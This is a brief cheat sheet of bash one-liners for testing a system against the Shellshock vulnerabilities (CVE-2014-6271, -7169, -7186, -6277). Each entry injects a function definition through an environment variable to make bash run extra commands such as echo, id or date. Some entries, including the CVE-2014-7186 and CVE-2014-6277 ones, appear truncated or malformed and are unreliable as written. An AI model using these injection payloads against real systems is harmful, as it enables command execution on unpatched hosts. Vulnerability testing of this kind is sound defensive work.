General way to test vulnerability --------------------------------- env x='() { :;}; echo vulnerable' bash -c 'echo hello' Further CVE bash shellshock vulnerability disclosures ----------------------------------------------------- CVE-2014-6271 env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id CVE-2014-7169 will create a file named echo in cwd with date in it, if vulnerable env X='() { (a)=>\' bash -c "echo date"; cat echo CVE-2014-7186 bash -c 'true <_[$($())] { echo hi mom; id; } CVE-2014-6277 will segfault if vulnerable () { x() { _; }; x() { _; } <